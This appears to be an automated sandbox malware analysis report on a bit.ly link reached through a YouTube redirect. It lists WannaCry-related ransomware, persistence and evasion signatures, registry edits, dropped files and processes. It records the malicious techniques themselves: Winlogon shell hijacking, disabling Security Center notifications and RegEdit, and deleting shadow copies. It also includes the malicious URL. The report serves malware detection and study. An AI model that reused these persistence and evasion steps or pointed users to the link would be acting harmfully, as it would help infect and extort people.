Malware Analysis Report

2025-04-13 22:30

Sample ID 240324-2zp6kshg98
Target https://www.youtube.com/redirect?event=comments&redir_token=QUFFLUhqbEdvM2JacWNycElueGhMazlTei16UW9PYmlJQXxBQ3Jtc0treDgtLVJhNUdxbDlBXzVkdEh6a3ZNYkFKMURVVWFha3c3LUhZZk84dUg4Q1VRNFBGOHE4TUJpckxHeHRSN2xaQWhVSU5OQlNMSmNaUHBWbjU1VzBtRi1FdGdEMmZDZFAwQ2NFM0xqYWVPUVZXOHA5RQ&q=https%3A%2F%2Fbit.ly%2F3Trfb6a&stzid=UgzgSIxotTTHMiWttmF4AaABAg
Tags
wannacry bootkit discovery evasion persistence ransomware spyware stealer trojan upx worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://www.youtube.com/redirect?event=comments&redir_token=QUFFLUhqbEdvM2JacWNycElueGhMazlTei16UW9PYmlJQXxBQ3Jtc0treDgtLVJhNUdxbDlBXzVkdEh6a3ZNYkFKMURVVWFha3c3LUhZZk84dUg4Q1VRNFBGOHE4TUJpckxHeHRSN2xaQWhVSU5OQlNMSmNaUHBWbjU1VzBtRi1FdGdEMmZDZFAwQ2NFM0xqYWVPUVZXOHA5RQ&q=https%3A%2F%2Fbit.ly%2F3Trfb6a&stzid=UgzgSIxotTTHMiWttmF4AaABAg was found to be: Known bad.

Malicious Activity Summary

wannacry bootkit discovery evasion persistence ransomware spyware stealer trojan upx worm

Modifies WinLogon for persistence

Wannacry

Windows security bypass

Deletes shadow copies

Modifies RDP port number used by Windows

Disables RegEdit via registry modification

Blocklisted process makes network request

Downloads MZ/PE file

Sets service image path in registry

Modifies Installed Components in the registry

Drops file in Drivers directory

Loads dropped DLL

Reads user/profile data of web browsers

Windows security modification

Drops startup file

Checks BIOS information in registry

UPX packed file

Executes dropped EXE

Registers COM server for autorun

Modifies file permissions

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Maps connected drives based on registry

Writes to the Master Boot Record (MBR)

Adds Run key to start application

Enumerates connected drives

Checks installed software on the system

Sets desktop wallpaper using registry

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Modifies system certificate store

Modifies registry key

Modifies Internet Explorer start page

Suspicious behavior: AddClipboardFormatListener

Uses Volume Shadow Copy service COM API

Views/modifies file attributes

Checks processor information in registry

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy WMI provider

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Runs net.exe

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious behavior: LoadsDriver

System policy modification

Modifies registry class

Delays execution with timeout.exe

Checks SCSI registry key(s)

Enumerates system info in registry

NTFS ADS

Suspicious behavior: EnumeratesProcesses

Script User-Agent

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-24 23:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-24 23:01

Reported

2024-03-24 23:37

Platform

win10v2004-20240226-en

Max time kernel

2094s

Max time network

2010s

Command Line

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.youtube.com/redirect?event=comments&redir_token=QUFFLUhqbEdvM2JacWNycElueGhMazlTei16UW9PYmlJQXxBQ3Jtc0treDgtLVJhNUdxbDlBXzVkdEh6a3ZNYkFKMURVVWFha3c3LUhZZk84dUg4Q1VRNFBGOHE4TUJpckxHeHRSN2xaQWhVSU5OQlNMSmNaUHBWbjU1VzBtRi1FdGdEMmZDZFAwQ2NFM0xqYWVPUVZXOHA5RQ&q=https%3A%2F%2Fbit.ly%2F3Trfb6a&stzid=UgzgSIxotTTHMiWttmF4AaABAg

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\gog.exe" C:\Users\Admin\Desktop\[email protected] N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe," C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,\"C:\\Program Files (x86)\\Def Group\\PC Defender\\Antispyware.exe\"" C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,\"C:\\Program Files (x86)\\Def Group\\PC Defender\\Antispyware.exe\"," C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SHELL = "C:\\Users\\Admin\\AppData\\Roaming\\gog.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A

Wannacry

ransomware worm wannacry

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FIREWALLDISABLENOTIFY = "0" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UPDATESDISABLENOTIFY = "1" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ANTIVIRUSDISABLENOTIFY = "1" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UPDATESDISABLENOTIFY = "0" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ANTIVIRUSDISABLENOTIFY = "0" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FIREWALLDISABLENOTIFY = "1" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A

Deletes shadow copies

ransomware

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DISABLEREGISTRYTOOLS = "0" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DISABLEREGISTRYTOOLS = "1" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\DRIVERS\SET961F.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\system32\DRIVERS\SET171.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\system32\DRIVERS\mbam.sys C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\MbamElam.sys C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\SETA35E.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\SETD8F8.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\system32\drivers\mbae64.sys C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\SETCC06.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\system32\DRIVERS\SETCC06.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\SysWOW64\drivers\mbamtestfile.dat C:\Users\Admin\Downloads\MBSetup.exe N/A
File created C:\Windows\system32\DRIVERS\mwac.sys C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\system32\DRIVERS\SET1B45.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\system32\DRIVERS\MbamChameleon.sys C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\SET961F.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\SETE5BB.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\system32\DRIVERS\MbamElam.sys C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\system32\DRIVERS\SETD8F8.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\system32\DRIVERS\SETB050.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\SET171.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\system32\DRIVERS\SETE72.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\farflt.sys C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\SETB050.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\system32\DRIVERS\SETE5BB.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\SETE72.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\SET1B45.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\system32\DRIVERS\mbamswissarmy.sys C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\system32\DRIVERS\SETA35E.tmp C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Modifies RDP port number used by Windows

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MBAMSwissArmy\ImagePath = "\\SystemRoot\\System32\\Drivers\\mbamswissarmy.sys" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mbamchameleon\ImagePath = "\\SystemRoot\\System32\\Drivers\\MbamChameleon.sys" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\MBSetup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Users\Admin\Downloads\MBSetup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbupdatrV5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbupdatrV5.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\WINDOWS\302746537.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDE62D.tmp C:\Users\Admin\Downloads\WannaCry.EXE N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDE634.tmp C:\Users\Admin\Downloads\WannaCry.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\robux.exe N/A
N/A N/A C:\Users\Admin\Downloads\robux.exe N/A
N/A N/A C:\Users\Admin\Downloads\MBSetup.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe N/A
N/A N/A C:\Users\Admin\Downloads\WannaCry.EXE N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\LocalLow\IGDump\jewzhlkrnqyathxklnydxjzurgkqaubq\ig.exe N/A
N/A N/A C:\Users\Admin\Downloads\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\LocalLow\IGDump\ermwdkqkmvirqsylfzwcpextxxzqrhza\ig.exe N/A
N/A N/A C:\Users\Admin\Downloads\taskse.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\taskdl.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe N/A
N/A N/A C:\WINDOWS\302746537.exe N/A
N/A N/A C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Registers COM server for autorun

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9DAB0CA5-AE19-41AE-955C-41DD44C52697}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9DAB0CA5-AE19-41AE-955C-41DD44C52697}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11D1E5E8-14E1-4B5B-AE1A-2678CB91E8E5}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BF474111-9116-45C6-AF53-209E64F1BB53}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8F1C46F8-E697-4175-B240-CDE682A4BA2D}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8F1C46F8-E697-4175-B240-CDE682A4BA2D}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{376BE474-56D4-4177-BB4E-5610156F36C8}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
